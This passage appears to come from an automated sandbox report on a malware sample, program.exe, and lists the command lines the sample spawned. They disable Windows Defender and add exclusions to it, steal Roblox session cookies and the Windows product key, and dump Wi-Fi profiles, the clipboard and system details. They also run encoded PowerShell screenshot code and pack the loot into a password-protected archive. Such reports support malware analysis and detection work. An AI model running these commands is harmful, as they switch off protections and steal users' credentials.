IAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES93BE.tmp" "c:\Users\user\AppData\Local\Temp\tgmup5d5\CSC93ACBC84BC674220B3501D9F22ECFDE.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaag